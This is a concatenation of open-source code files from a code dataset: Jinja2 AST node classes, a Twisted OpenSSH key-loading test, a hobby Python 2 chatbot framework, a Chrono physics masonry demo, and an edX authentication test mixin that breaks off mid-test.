:meth:`~jinja2.parser.Parser.free_identifier` method that creates
a new identifier for you. This identifier is not available from the
    template and is not treated specially by the compiler.
"""
fields = ('name',)
def __init__(self):
raise TypeError('Can\'t create internal names. Use the '
'`free_identifier` method on a parser.')
class MarkSafe(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`)."""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return Markup(self.expr.as_const(eval_ctx))
class ContextReference(Expr):
"""Returns the current template context. It can be used like a
:class:`Name` node, with a ``'load'`` ctx and will return the
current :class:`~jinja2.runtime.Context` object.
Here an example that assigns the current template name to a
variable named `foo`::
Assign(Name('foo', ctx='store'),
Getattr(ContextReference(), 'name'))
"""
class Continue(Stmt):
"""Continue a loop."""
class Break(Stmt):
"""Break a loop."""
class Scope(Stmt):
"""An artificial scope."""
fields = ('body',)
class EvalContextModifier(Stmt):
"""Modifies the eval context. For each option that should be modified,
a :class:`Keyword` has to be added to the :attr:`options` list.
Example to change the `autoescape` setting::
EvalContextModifier(options=[Keyword('autoescape', Const(True))])
"""
fields = ('options',)
class ScopedEvalContextModifier(EvalContextModifier):
"""Modifies the eval context and reverts it later. Works exactly like
:class:`EvalContextModifier` but will only modify the
:class:`~jinja2.nodes.EvalContext` for nodes in the :attr:`body`.
"""
fields = ('body',)
# make sure nobody creates custom nodes
def _failing_new(*args, **kwargs):
raise TypeError('can\'t create custom node types')
NodeType.__new__ = staticmethod(_failing_new); del _failing_new
|
apache-2.0
|
flyfei/python-for-android
|
python-modules/twisted/twisted/conch/test/test_openssh_compat.py
|
60
|
3381
|
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.openssh_compat}.
"""
import os
from twisted.trial.unittest import TestCase
from twisted.python.filepath import FilePath
from twisted.python.compat import set
try:
import Crypto.Cipher.DES3
import pyasn1
except ImportError:
OpenSSHFactory = None
else:
from twisted.conch.openssh_compat.factory import OpenSSHFactory
from twisted.conch.test import keydata
from twisted.test.test_process import MockOS
class OpenSSHFactoryTests(TestCase):
"""
Tests for L{OpenSSHFactory}.
"""
if getattr(os, "geteuid", None) is None:
skip = "geteuid/seteuid not available"
elif OpenSSHFactory is None:
skip = "Cannot run without PyCrypto or PyASN1"
def setUp(self):
self.factory = OpenSSHFactory()
self.keysDir = FilePath(self.mktemp())
self.keysDir.makedirs()
self.factory.dataRoot = self.keysDir.path
self.keysDir.child("ssh_host_foo").setContent("foo")
self.keysDir.child("bar_key").setContent("foo")
self.keysDir.child("ssh_host_one_key").setContent(
keydata.privateRSA_openssh)
self.keysDir.child("ssh_host_two_key").setContent(
keydata.privateDSA_openssh)
self.keysDir.child("ssh_host_three_key").setContent(
"not a key content")
self.keysDir.child("ssh_host_one_key.pub").setContent(
keydata.publicRSA_openssh)
self.mockos = MockOS()
self.patch(os, "seteuid", self.mockos.seteuid)
self.patch(os, "setegid", self.mockos.setegid)
def test_getPublicKeys(self):
"""
L{OpenSSHFactory.getPublicKeys} should return the available public keys
in the data directory
"""
keys = self.factory.getPublicKeys()
self.assertEquals(len(keys), 1)
keyTypes = keys.keys()
self.assertEqual(keyTypes, ['ssh-rsa'])
def test_getPrivateKeys(self):
"""
L{OpenSSHFactory.getPrivateKeys} should return the available private
keys in the data directory.
"""
keys = self.factory.getPrivateKeys()
self.assertEquals(len(keys), 2)
keyTypes = keys.keys()
self.assertEqual(set(keyTypes), set(['ssh-rsa', 'ssh-dss']))
self.assertEquals(self.mockos.seteuidCalls, [])
self.assertEquals(self.mockos.setegidCalls, [])
def test_getPrivateKeysAsRoot(self):
"""
L{OpenSSHFactory.getPrivateKeys} should switch to root if the keys
aren't readable by the current user.
"""
keyFile = self.keysDir.child("ssh_host_two_key")
# Fake permission error by changing the mode
keyFile.chmod(0000)
self.addCleanup(keyFile.chmod, 0777)
# And restore the right mode when seteuid is called
savedSeteuid = os.seteuid
def seteuid(euid):
keyFile.chmod(0777)
return savedSeteuid(euid)
self.patch(os, "seteuid", seteuid)
keys = self.factory.getPrivateKeys()
self.assertEquals(len(keys), 2)
keyTypes = keys.keys()
self.assertEqual(set(keyTypes), set(['ssh-rsa', 'ssh-dss']))
self.assertEquals(self.mockos.seteuidCalls, [0, os.geteuid()])
self.assertEquals(self.mockos.setegidCalls, [0, os.getegid()])
|
apache-2.0
|
byteface/sing
|
core/PyPal.py
|
1
|
16532
|
"""
PyPal.py
@author: byteface
"""
class PyPal(object):
"""
PyPal is the heart for all pypals :)
"""
# TODO - tell command to pass messages to other pypals. non conflicting. saves having to quit out of current one
# TODO - list commands
# TODO - learn from. quick command to copy commands between pypals may be useful. save moving between dirs and copying
    # memory? - obj with functions for loading data etc.
# dictionary that stores object from _meta.json
o = None
# TODO - if current context is gone should be able to go through history
# MULTIPLE CONTEXT OBJECT MAY NEED TO EXISTS. searching for relevant ones is a requirement
context=None
# TODO - should every statement should carry certainty?. for now maybe store number 0-1 on here?
#certainty=0
# TODO third person, you, actor???... you can 'be' another person
#perspective={}
# the natural language processing engine. eventually will live on a brain object
nlp=None # TODO - should be an array
# natural language generation. used for output
nlg=None # TODO - as above
def __init__(self,data):
"""
data param is obj with unique name. i.e {'name':'pypal'}
"""
import json
with open("bin/%s/_meta.json" % data['name']) as json_file:
self.o = json.load(json_file)['object']
# TODO - externalise the class
self.nlp=NLP( self )
# TODO - externalise the class
self.nlg=NLG( self )
#self.context=Context( [self], [self] ) # talk to self
def introduce(self):
"""
introduce - when a pypal is first created this is what it says
"""
self.nlg.say( "Hi my name is %s, Thankyou for creating me!" % self.o['name'] )
self.listen()
def welcome(self):
"""
welcome - whenever you init a pypal
"""
self.nlg.say( "%s I see you have returned!" % self.o['friend'] )
# TODO - display stats?
self.listen()
# TODO - listen should really be an open stream at the moment this is just a friend channel.
    # TODO - create channels for pypal>pypal comms
# TODO - event should be created
# TODO - should be having thoughts
def listen(self):
# NOTE - listen currently considers it to be friend who is talking
#self_obj = self.nlp.runWordAsFunction( 'bin/%s/brain/perception/self/' % self.o['name'], self.o['name'] )
#friend_obj = self.nlp.runWordAsFunction( 'bin/%s/brain/perception/physical/animal/human/' % self.o['name'], self.o['friend'] )
#friend_obj={}
try:
            # THIS IS APPARENTLY A nix-ONLY SOLUTION FOR AUTO PROCESSING
            # IT WILL TIME OUT IF NO INPUT RESPONSE AND RUN AUTOMATIONS
            # steps towards automation. I looked at using multiprocessing and threads but none can stop a raw_input
            # for now i'm doing it this way just as I'm building some content bots and need it sorting
# the timeout for automation
#import signal
#signal.signal(signal.SIGALRM, self.automate)
#signal.alarm(10)
#from threading import Timer
#t=Timer(10,self.automate)
#t.start()
self.nlg.say( "I am listening..." )
import sys
from select import select
# TODO - keys presses should reset the timeout
timeout = 10000 # TODO - add to a pypal config?? - make timeout longer. for testing type automate. have flag/config for autobots?
rlist, _, _ = select([sys.stdin], [], [], timeout)
if rlist:
s = sys.stdin.readline().strip()
self.process(s)
self.listen()
else:
self.nlg.say( "No input. Automating..." ) # TODO - just run as bg proccess
self.automate()
self.listen()
return
# NOTE - DOESN'T RUN ANYMORE
# NOTE - old way. preserving here for now until I figure this all out
#self.nlg.say( "I am listening..." )
#information = raw_input("> ")
#self.process( information )
# TODO - parallel process for automation whilst listening?
except:
self.nlg.log( "FAIL :::::listen" )
def automate(self,*args,**kwargs):
"""
automate is a super simple task runner
it executes tasks listed in brain/automation/tasks.json
"""
self.nlg.log( "automate" )
try:
# add and run automation.py
path = 'bin/%s/brain/automation' % self.o['name']
import sys
sys.path.append( path )
task_runner = __import__( 'automate' )
task_runner.run(self,path)
except Exception:
self.nlg.log( "AUTOMATE FAIL!" )
# TODO - what when automations are complete?. currently returns to listening
#self.listen()
return
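# For illustration only: a minimal (hypothetical) brain/automation/automate.py
# that satisfies the task_runner.run(self, path) call above could look like:
#
#   import json, os
#   def run(pypal, path):
#       with open(os.path.join(path, 'tasks.json')) as f:
#           tasks = json.load(f)
#       for task in tasks:
#           pypal.process(task)  # assuming each task is a plain command string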
history=[] # TODO - should the history go on the context obj?
## TODO - this should be a HEAR function and should process chunks
# TODO - this would also be good to parallel-process, deciding which streams of information to listen to or ignore
def process(self,information,caller=None,callee=None):
self.context=Context( self, information ) # FOR NOW JUST FOR STORING PATHS
self.history.append(information)
# update the context object
#self.context=Context( [caller], [callee] )
# bust all into words, squash whitespace
words = information.split(None)
# if its a one letter answer. some helpers/shortcuts
if len(words)==1:
# added a repeat function
if information == 'r':
print self.history[len(self.history)-2]
self.process( self.history[len(self.history)-2] )
return
# show command history
if information == 'h':
for h in self.history:
print h
return
# TODO - some more 1 key helpers
# 'r' - repeat last command
# 'h' - history
# 'c' - show all available commands in pypal
self.nlp.processOneWord( information )
#self.listen()
return
self.nlp.processSentence( information )
#self.listen()
return
# TODO - need to ask meaning of words. to at least put it into memory for considering
# should also be able to check dictionary / nltk sources. but needs to build a program for the word
def ask_word_meaning(self,word):
self.nlg.say( "What is '%s'?" % word ) # NOTE - say() lives on the NLG, not the NLP
answer = raw_input("> ")
# TODO - should probably process the response instead
self.nlp.addNewWord( word, answer )
# when the bot is not active could explore data sources
# using a decorator pattern for behaviours on data
# def explore(self):
# TODO - let bot decide/choose which data source to consume
# TODO - can bot find new data sources? from interaction with other bots
# TODO - to begin with will attempt to build knowledge graph data sets
# from webpages/ relational object maps from text
# can also explore things in the world
# there are various ways of determining what to explore in the world
# TODO - create a discover function?...
# do this by going into unknown. i.e. inventing urls to read.
# figure out how to chain commands?
# how to 'think of something to do'
# def spawn(self):
# def merge(self,pypal):
# the first job of the context object is to store caller, callee information
# Who is talking and who are they talking to
# NOTE / TODO - this may evolve with time
class Context(object):
"""
Context still to be fully defined.
Will hold things like conversation history and caller/callee information and is used to aid comprehension
not just personable but subject context
i.e. if i say show list, then add to list should add to the one ive shown
hmmmm caller callee is perspective and incorrectly stubbed here. probably why i removed
the implementation. unless perspective is an object that also resides in a context object?
NOW GIVES SOME PATH INFO. can access in a command like
o.context.COMMAND_PATH
Also forces app into running 1 command at a time. which is good. as that's how a brain kinda works.
you could probably still spin threads in commands if required. but with context we have 1 train of thought, which is the running command
"""
# both can be lists of animals
caller=None
callee=None
# useful for commands to know where they are loading from
# so can dump/store stuff there directly when scraping etc.
#BASEPATH = './bin/%s/brain/commands/add/grades/files3' % o.o['name']
BASEPATH=''
# TODO - may move these 3 onto the NLP. and make context more of a caretaker pattern extended to surmise and store sessions.
LAST_COMMAND =''
COMMAND_PATH =''
#PARAMS=''
def __init__(self, parent, command, caller=None,callee=None):
# self.caller=caller
# self.callee=callee
self.BASEPATH = './bin/%s/brain/commands' % parent.o['name']
self.LAST_COMMAND = command
path = '/'.join( self.LAST_COMMAND.split(' ') )
file = '_'.join( self.LAST_COMMAND.split(' ') ) + '.py'
#self.COMMAND_PATH = '%s/%s/%s' % ( self.BASEPATH, path, file )
self.COMMAND_PATH = '%s/%s' % ( self.BASEPATH, path )
#self.PARAMS='' # NOTE - gets updated once string is parsed
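# Worked example (illustrative): for a pypal named 'pypal', Context(parent, 'add grades')
# yields BASEPATH './bin/pypal/brain/commands' and
# COMMAND_PATH './bin/pypal/brain/commands/add/grades';
# the file variable would be 'add_grades.py', though only the path is kept here.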
class NLP(object):
"""
NLP are processes for word parsing. Generating functions for words.
Essentially a custom module loader
"""
owner=None
# TODO -
#TIME
#PLACE
#BASEPATH = './bin/%s/brain/commands/add/grades/files3' % o.o['name']
def __init__(self,owner):
self.owner=owner
def addNewWord( self, word, answer ):
# TODO - addNewWord. store what friend thinks/says it is
return
def processOneWord( self, word ):
"""
parse single word commands.
basically runs a command from the command folder
"""
#TODO - check that the word is clean
#TODO - see if we know the word
#TODO - deal with innuendo
#TODO - a lemmatiser may be required. or are we re-routing manually?
knows_word=False
c_path = 'bin/%s/brain/commands' % self.owner.o['name']
if self.has_command(c_path+"/"+word+"/"+word+".py"):
self.owner.nlg.log( "command detected" )
knows_word=True
return self.runWordAsFunction( c_path, word )
if knows_word == False:
self.owner.nlg.say( "I don't yet know that word" )
# now that we know input function we can run it..
# TODO - should probably create new problem though and process that way
# TODO - all the meta properties need updating
def runWordAsFunction(self,path,word):
import sys
sys.path.append( "%s/%s" % (path,word) )
try:
# TODO - check and update all the meta props
command_module = __import__( word )
reload(command_module) # reload class without restarting pypal
return command_module.run(self.owner)
except Exception, e:
self.owner.nlg.say( "Sorry, I can't do that, I tried but it didn't work" )
self.owner.nlg.log( "CHECK YOUR VIRUTAL ENVIRONMENT IS RUNNING." )
pass
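# For illustration: a minimal (hypothetical) single-word command, e.g.
# bin/<name>/brain/commands/hello/hello.py, only needs a run(owner) entry point:
#
#   def run(owner):
#       owner.nlg.say("hello %s" % owner.o['friend'])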
# TODO - try to find the finite verb
# NOTE - AT THE MOMENT ONLY PROCESSING COMMANDS
def processSentence( self, sentence ):
# print "processSentence"
words = sentence.split(None)
word_count = len(words)
basepath = 'bin/%s/brain/commands' % self.owner.o['name']
word_path_arr=[]
# walk up the sentence
for word in words:
root = basepath+"/"+'/'.join(word_path_arr)
has_path = self.has_path( root +"/"+ word )
# if next word is the last word. check for a command and run it without params.
if (len(word_path_arr)+1)==word_count:
path = root+"/"+word
function = '_'.join( word_path_arr ) + "_" + word
if self.has_command(path+"/"+function+".py"):
return self.runSentenceAsFunction( path, function )
# if nowhere to go. but there's a command at current path. run it and pass the rest as param
if (False==has_path):
function = '_'.join( word_path_arr )
if self.has_command(root+"/"+function+".py"):
# get params by removing where we were up to
params = sentence.replace( ' '.join( word_path_arr ), '' )
# REMOVE THE WHITE SPACE FROM START OF PARAMS
params = params[1:]
# TODO - note. i see i built up the path to strip the param. problem here is the param is on the command_path and doesn't get parsed off until here, during execution.
# TODO - will have a rethink about how want context to work before changing this. so for now will operate on the context obj here
# TODO - when doing change, nlp ref should probs get given to context. or context keeps them all in array.
self.owner.context.COMMAND_PATH = self.owner.context.COMMAND_PATH.replace( params, '' )
#self.owner.context.PARAMS = params
# TODO - throw error if no param is passed
if params == None or params == '':
print 'ERROR: parameter expected, none received'
# run the function
return self.runSentenceAsFunction( root, function, params )
else:
break
word_path_arr.append(word)
# TODO - if no command, attempt generating a response from the self-compiled programs.
# TODO - integrate memory, world states, schemas and emotions
# A LAD is a KAD : cognitive learning
return self.owner.nlg.say( "No command found" )
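# Worked example (illustrative, assuming the directories exist): for the input
# 'add grades 90' the walk above descends commands/add/grades, finds no '90'
# branch, locates add_grades.py at commands/add/grades, strips the matched
# words so params == '90', and finally calls add_grades.run(owner, '90').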
# params at the moment are 'rest of string'
# long term might break around finite verb and pass whole string?
def runSentenceAsFunction(self,path,function,params=None):
#print "runSentenceAsFunction"
#print path, function, params
import sys
sys.path.append( path )
try:
# TODO - check all the meta props
# TODO - may need to also write to some of the meta
# TODO - if no meta create a default one
command_module = __import__( function )
reload(command_module) # reload class without restarting pypal
if(params!=None):
return command_module.run(self.owner,params)
else:
return command_module.run(self.owner)
pass
except Exception, e:
self.owner.nlg.log( "runSentenceAsFunction FAIL!! \
\n happens when : \
\n failing code in the command. i.e. imports used by the command not installed \
\n venv not running \
\n not passing params when required" )
return False
#self.owner.listen()
pass
# run several possibilities. decide which is most relevant?
# the listener has to suppose an ontological truth in each word as they hear it
# when that doesn't happen, even over sets of words, things have to be reconsidered
# and more context or information found. it can even lead to questioning
def suppose(self):
pass
## ---------------------------- NLP LANGUAGE UTILS -----------------------------------
# check a lookup table of yes words. program needs to be able to expand that list
# TODO - if one word use lookup, else use NLTK sentiment tool
# NOTE - false DOES NOT MEAN it is negative, it could be neutral
def is_string_positive( self, s ):
pass
# check a lookup table of no words. program needs to be able to expand that list
# TODO - if one word use lookup, else use NLTK sentiment tool
# NOTE - false DOES NOT MEAN it is positive, it could be neutral
def is_string_negative( self, s ):
pass
# check a lookup table of numbers
# TODO - building lookup tables on the fly is something we need to do
# RETURN THE NUMBER, OR FALSE
def is_string_number( self, s ):
# TODO - check if NLTK can do this
pass
def is_math_operator(self):
# TODO - check if NLTK can do this
pass
## ---------------------------- NLP FILE UTILS -----------------------------------
# TODO - may get rid of this lookup and have root words as delegators
def hasParams( self, path, word ):
"""
check whether the command accepts parameters (True/False)
"""
try:
#TODO - should just check if the folder has a param folder
import Program
program = Program.Program( path, word );
canHasParams = program.meta.get_property( 'rules', 'parameters' );
return canHasParams
except:
print "no meta or param found"
return False # force false if passing a non-command. TODO - BUT we shouldn't be calling this if that's the case.
def has_path( self, path_to_directory ):
import os.path
return os.path.isdir(path_to_directory)
def has_command(self, path_to_py_file):
import os.path
return os.path.isfile(path_to_py_file)
class NLG(object):
"""
NLG - generates sentences in the natural language.
at the moment it just prints strings to output.
from now on all output should come through here
"""
owner=None
def __init__(self,owner):
self.owner=owner
def say( self, words ):
"""
output helps distinguish pypals when in the console
"""
print "%s : %s" % ( self.owner.o['name'], words )
return
# TODO - setup python logger
# TODO - pass ref to pypal?
# TODO - logs should write to a file and be accessible by events. i.e. evt12345 - created variable xxx
def log( self, words ):
"""
log differs to the 'say' method.
log should be more about debugging.
say should be user comms
"""
return # NOTE <<<<<<<<<<<<<<<<<<<<<< i'm not running
# TODO - if debug is true
import logging
logging.warning( "------------------------------------- %s : %s" % ( self.owner.o['name'], words ) )
return
|
gpl-2.0
|
tjolsen/chrono
|
src/demos/python/demo_masonry.py
|
2
|
8080
|
#-------------------------------------------------------------------------------
# Name: demo_masonry
#
# This file shows how to
# - create a small stack of bricks,
# - create a support that shakes like an earthquake, with imposed motion law
# - simulate the bricks that fall
# - output the postprocessing data for rendering the animation with POVray
#-------------------------------------------------------------------------------
#!/usr/bin/env python
# Load the Chrono::Engine unit and the postprocessing unit!!!
import ChronoEngine_python_core as chrono
import ChronoEngine_python_postprocess as postprocess
import ChronoEngine_python_irrlicht as chronoirr
# We will create two directories for saving some files, we need this:
import os
import math
# ---------------------------------------------------------------------
#
# Create the simulation system and add items
#
my_system = chrono.ChSystem()
# Set the default outward/inward shape margins for collision detection,
# this is especially important for very large or very small objects.
chrono.ChCollisionModel.SetDefaultSuggestedEnvelope(0.001)
chrono.ChCollisionModel.SetDefaultSuggestedMargin(0.001)
# Maybe you want to change some settings for the solver. For example you
# might want to use SetMaxItersSolverSpeed to set the number of iterations
# per timestep, etc.
#my_system.SetSolverType(chrono.ChSolver.Type_BARZILAIBORWEIN) # more precise, but slower
my_system.SetMaxItersSolverSpeed(70)
# Create a contact material (surface property) to share between all objects.
# The rolling and spinning parameters are optional - if enabled they double
# the computational time.
brick_material = chrono.ChMaterialSurface()
brick_material.SetFriction(0.5)
brick_material.SetDampingF(0.2)
brick_material.SetCompliance (0.0000001)
brick_material.SetComplianceT(0.0000001)
# brick_material.SetRollingFriction(rollfrict_param)
# brick_material.SetSpinningFriction(0)
# brick_material.SetComplianceRolling(0.0000001)
# brick_material.SetComplianceSpinning(0.0000001)
# Create the set of bricks in a vertical stack, along Y axis
nbricks_on_x = 1
nbricks_on_y = 6
size_brick_x = 0.25
size_brick_y = 0.12
size_brick_z = 0.12
density_brick = 1000 # kg/m^3
mass_brick = density_brick * size_brick_x * size_brick_y * size_brick_z
inertia_brick = (2./5.)*(pow(size_brick_x,2))*mass_brick # float division: 2/5 is 0 under Python 2; to do: compute separate xx,yy,zz inertias
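# For reference (standard cuboid formulas, a sketch of the to-do above), the
# separate inertias of a solid box about its own axes would be:
#   Ixx = mass_brick/12.0 * (size_brick_y**2 + size_brick_z**2)
#   Iyy = mass_brick/12.0 * (size_brick_x**2 + size_brick_z**2)
#   Izz = mass_brick/12.0 * (size_brick_x**2 + size_brick_y**2)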
for ix in range(0,nbricks_on_x):
for iy in range(0,nbricks_on_y):
# create it
body_brick = chrono.ChBody()
# set initial position
body_brick.SetPos(chrono.ChVectorD(ix*size_brick_x, (iy+0.5)*size_brick_y, 0 ))
# set mass properties
body_brick.SetMass(mass_brick)
body_brick.SetInertiaXX(chrono.ChVectorD(inertia_brick,inertia_brick,inertia_brick))
# set collision surface properties
body_brick.SetMaterialSurface(brick_material)
# Collision shape
body_brick.GetCollisionModel().ClearModel()
body_brick.GetCollisionModel().AddBox(size_brick_x/2, size_brick_y/2, size_brick_z/2) # must set half sizes
body_brick.GetCollisionModel().BuildModel()
body_brick.SetCollide(True)
# Visualization shape, for rendering animation
body_brick_shape = chrono.ChBoxShape()
body_brick_shape.GetBoxGeometry().Size = chrono.ChVectorD(size_brick_x/2, size_brick_y/2, size_brick_z/2)
if iy%2==0 :
body_brick_shape.SetColor(chrono.ChColor(0.65, 0.65, 0.6)) # set gray color only for even bricks
body_brick.GetAssets().push_back(body_brick_shape)
my_system.Add(body_brick)
# Create the room floor: a simple fixed rigid body with a collision shape
# and a visualization shape
body_floor = chrono.ChBody()
body_floor.SetBodyFixed(True)
body_floor.SetPos(chrono.ChVectorD(0, -2, 0 ))
body_floor.SetMaterialSurface(brick_material)
# Collision shape
body_floor.GetCollisionModel().ClearModel()
body_floor.GetCollisionModel().AddBox(3, 1, 3) # hemi sizes
body_floor.GetCollisionModel().BuildModel()
body_floor.SetCollide(True)
# Visualization shape
body_floor_shape = chrono.ChBoxShape()
body_floor_shape.GetBoxGeometry().Size = chrono.ChVectorD(3, 1, 3)
body_floor.GetAssets().push_back(body_floor_shape)
body_floor_texture = chrono.ChTexture()
body_floor_texture.SetTextureFilename('../../../data/concrete.jpg')
body_floor.GetAssets().push_back(body_floor_texture)
my_system.Add(body_floor)
# Create the shaking table, as a box
size_table_x = 1
size_table_y = 0.2
size_table_z = 1
body_table = chrono.ChBody()
body_table.SetPos(chrono.ChVectorD(0, -size_table_y/2, 0 ))
body_table.SetMaterialSurface(brick_material)
# Collision shape
body_table.GetCollisionModel().ClearModel()
body_table.GetCollisionModel().AddBox(size_table_x/2, size_table_y/2, size_table_z/2) # hemi sizes
body_table.GetCollisionModel().BuildModel()
body_table.SetCollide(True)
# Visualization shape
body_table_shape = chrono.ChBoxShape()
body_table_shape.GetBoxGeometry().Size = chrono.ChVectorD(size_table_x/2, size_table_y/2, size_table_z/2)
body_table_shape.SetColor(chrono.ChColor(0.4,0.4,0.5))
body_table.GetAssets().push_back(body_table_shape)
body_table_texture = chrono.ChTexture()
body_table_texture.SetTextureFilename('../../../data/concrete.jpg')
body_table.GetAssets().push_back(body_table_texture)
my_system.Add(body_table)
# Create a constraint that blocks the 3 x y z translations and 3 rx ry rz rotations
# of the table with respect to the floor, and impose that the relative position
# depends on a specified motion law.
link_shaker = chrono.ChLinkLockLock()
link_shaker.Initialize(body_table, body_floor, chrono.CSYSNORM)
my_system.Add(link_shaker)
# ..create the function for the imposed y motion, etc.
mfunY = chrono.ChFunction_Sine(0,1.5,0.001) # phase, frequency, amplitude
link_shaker.SetMotion_Y(mfunY)
# ..create the function for the imposed z motion, etc.
mfunZ = chrono.ChFunction_Sine(0,1.5,0.12) # phase, frequency, amplitude
link_shaker.SetMotion_Z(mfunZ)
# Note that you could use other types of ChFunction_ objects, or create
# your custom function by class inheritance (see demo_python.py), or also
# set a function for table rotation , etc.
# ---------------------------------------------------------------------
#
# Create an Irrlicht application to visualize the system
#
myapplication = chronoirr.ChIrrApp(my_system)
myapplication.AddTypicalSky('../../../data/skybox/')
myapplication.AddTypicalCamera(chronoirr.vector3df(0.5,0.5,1.0))
myapplication.AddLightWithShadow(chronoirr.vector3df(2,4,2), # point
chronoirr.vector3df(0,0,0), # aimpoint
9, # radius (power)
1,9, # near, far
30) # angle of FOV
# ==IMPORTANT!== Use this function for adding a ChIrrNodeAsset to all items
# in the system. These ChIrrNodeAsset assets are 'proxies' to the Irrlicht meshes.
# If you need a finer control on which item really needs a visualization proxy in
# Irrlicht, just use application.AssetBind(myitem); on a per-item basis.
myapplication.AssetBindAll();
# ==IMPORTANT!== Use this function to 'convert' the assets that you added to the
# bodies into Irrlicht meshes, so they can be visualized by Irrlicht!
myapplication.AssetUpdateAll();
# If you want to show the shadows cast because you used AddLightWithShadow(),
# you must remember this:
myapplication.AddShadowAll();
# ---------------------------------------------------------------------
#
# Run the simulation
#
myapplication.SetStepManage(True)
myapplication.SetTimestep(0.001)
myapplication.SetTryRealtime(True)
while(myapplication.GetDevice().run()):
myapplication.BeginScene()
myapplication.DrawAll()
for substep in range(0,5):
myapplication.DoStep()
myapplication.EndScene()
|
bsd-3-clause
|
arbrandes/edx-platform
|
openedx/core/djangoapps/user_authn/tests/utils.py
|
4
|
9542
|
""" Common utilities for tests in the user_authn app. """
from datetime import datetime, timedelta
from enum import Enum
from unittest.mock import patch
import ddt
import pytz
from django.conf import settings
from oauth2_provider import models as dot_models
from rest_framework import status
from openedx.core.djangoapps.oauth_dispatch.adapters.dot import DOTAdapter
from openedx.core.djangoapps.oauth_dispatch.jwt import _create_jwt
from common.djangoapps.student.tests.factories import UserFactory
class AuthType(Enum):
session = 1
oauth = 2
jwt = 3
jwt_restricted = 4
JWT_AUTH_TYPES = [AuthType.jwt, AuthType.jwt_restricted]
def setup_login_oauth_client():
"""
Sets up a test OAuth client for the login service.
"""
login_service_user = UserFactory.create()
DOTAdapter().create_public_client(
name='login-service',
user=login_service_user,
redirect_uri='',
client_id=settings.JWT_AUTH['JWT_LOGIN_CLIENT_ID'],
)
def utcnow():
"""
Helper function to return the current UTC time localized to the UTC timezone.
"""
return datetime.now(pytz.UTC)
@ddt.ddt
class AuthAndScopesTestMixin:
"""
Mixin class to test authentication and oauth scopes for an API.
Test classes that use this Mixin need to define:
default_scopes - default list of scopes to include in created JWTs.
get_url(self, username) - method that returns the URL to call given
a username.
assert_success_response_for_student(resp) - method that verifies the
data returned in a successful response when accessing the URL for
self.student.
"""
default_scopes = None
user_password = 'test'
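# An illustrative (hypothetical) subclass, assuming a DRF view routed by username:
#
#   class MyViewAuthTests(AuthAndScopesTestMixin, APITestCase):
#       default_scopes = ['read']
#
#       def get_url(self, username):
#           return reverse('my-view', kwargs={'username': username})
#
#       def assert_success_response_for_student(self, resp):
#           assert resp.data['username'] == self.student.username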
def setUp(self):
super().setUp()
self.student = UserFactory.create(password=self.user_password)
self.other_student = UserFactory.create(password=self.user_password)
self.global_staff = UserFactory.create(password=self.user_password, is_staff=True)
def get_response(self, auth_type, requesting_user=None, requested_user=None, url=None, token=None):
"""
Calls the url using the given auth_type.
Arguments:
- requesting_user is the user that is making the call to the url. Defaults to self.student.
- requested_user is the user that is passed to the url. Defaults to self.student.
- url defaults to the response from calling self.get_url with requested_user.username.
- token defaults to the default creation of the token given the value of auth_type.
"""
requesting_user = requesting_user or self.student
requested_user = requested_user or self.student
auth_header = None
if auth_type == AuthType.session:
self.client.login(username=requesting_user.username, password=self.user_password)
elif auth_type == AuthType.oauth:
if not token:
token = self._create_oauth_token(requesting_user)
auth_header = f"Bearer {token}"
else:
assert auth_type in JWT_AUTH_TYPES
if not token:
token = self._create_jwt_token(requesting_user, auth_type)
auth_header = f"JWT {token}"
extra = dict(HTTP_AUTHORIZATION=auth_header) if auth_header else {}
return self.client.get(
url if url else self.get_url(requested_user.username),
**extra
)
def _create_oauth_token(self, user):
""" Creates and returns an OAuth token for the given user. """
dot_app_user = UserFactory.create(password=self.user_password)
dot_app = dot_models.Application.objects.create(
name='test app',
user=dot_app_user,
client_type='confidential',
authorization_grant_type='authorization-code',
redirect_uris='http://localhost:8079/complete/edxorg/'
)
return dot_models.AccessToken.objects.create(
user=user,
application=dot_app,
expires=utcnow() + timedelta(weeks=1),
scope='read write',
token='test_token',
)
def _create_jwt_token(self, user, auth_type, scopes=None, include_org_filter=True, include_me_filter=False):
""" Creates and returns a JWT token for the given user with the given parameters. """
filters = []
if include_org_filter:
filters += [f'content_org:{self.course.id.org}']
if include_me_filter:
filters += ['user:me']
if scopes is None:
scopes = self.default_scopes
return _create_jwt(
user,
scopes=scopes,
is_restricted=(auth_type == AuthType.jwt_restricted),
filters=filters,
)
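# For illustration: with include_org_filter=True and include_me_filter=True the
# resulting JWT carries scopes == self.default_scopes and filters roughly like
#   ['content_org:SomeOrgX', 'user:me']
# (the org value comes from self.course, which the host test class must provide).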
def _assert_in_log(self, text, mock_log_method):
assert mock_log_method.called
assert text in mock_log_method.call_args_list[0][0][0]
def test_anonymous_user(self):
resp = self.client.get(self.get_url(self.student.username))
assert resp.status_code == status.HTTP_401_UNAUTHORIZED
@ddt.data(*JWT_AUTH_TYPES)
def test_self_user(self, auth_type):
resp = self.get_response(auth_type)
assert resp.status_code == status.HTTP_200_OK
self.assert_success_response_for_student(resp)
@ddt.data(*list(AuthType))
def test_staff_user(self, auth_type):
resp = self.get_response(auth_type, requesting_user=self.global_staff)
assert resp.status_code == status.HTTP_200_OK
self.assert_success_response_for_student(resp)
@ddt.data(*list(AuthType))
def test_inactive_user(self, auth_type):
self.student.is_active = False
self.student.save()
resp = self.get_response(auth_type)
assert resp.status_code == status.HTTP_200_OK
@patch('edx_rest_framework_extensions.permissions.log')
@ddt.data(*list(AuthType))
def test_another_user(self, auth_type, mock_log):
"""
Returns 403 for OAuth, Session, and JWT auth with IsUserInUrl.
Returns 200 for jwt_restricted and user:me filter unset.
"""
resp = self.get_response(auth_type, requesting_user=self.other_student)
# Restricted JWT tokens without the user:me filter have access to other users
expected_jwt_access_granted = auth_type == AuthType.jwt_restricted
assert resp.status_code == (status.HTTP_200_OK if expected_jwt_access_granted else status.HTTP_403_FORBIDDEN)
if not expected_jwt_access_granted:
self._assert_in_log("IsUserInUrl", mock_log.info)
@patch('edx_rest_framework_extensions.permissions.log')
@ddt.data(*JWT_AUTH_TYPES)
def test_jwt_no_scopes(self, auth_type, mock_log):
""" Returns 403 when scopes are enforced with JwtHasScope. """
jwt_token = self._create_jwt_token(self.student, auth_type, scopes=[])
resp = self.get_response(AuthType.jwt, token=jwt_token)
is_enforced = auth_type == AuthType.jwt_restricted
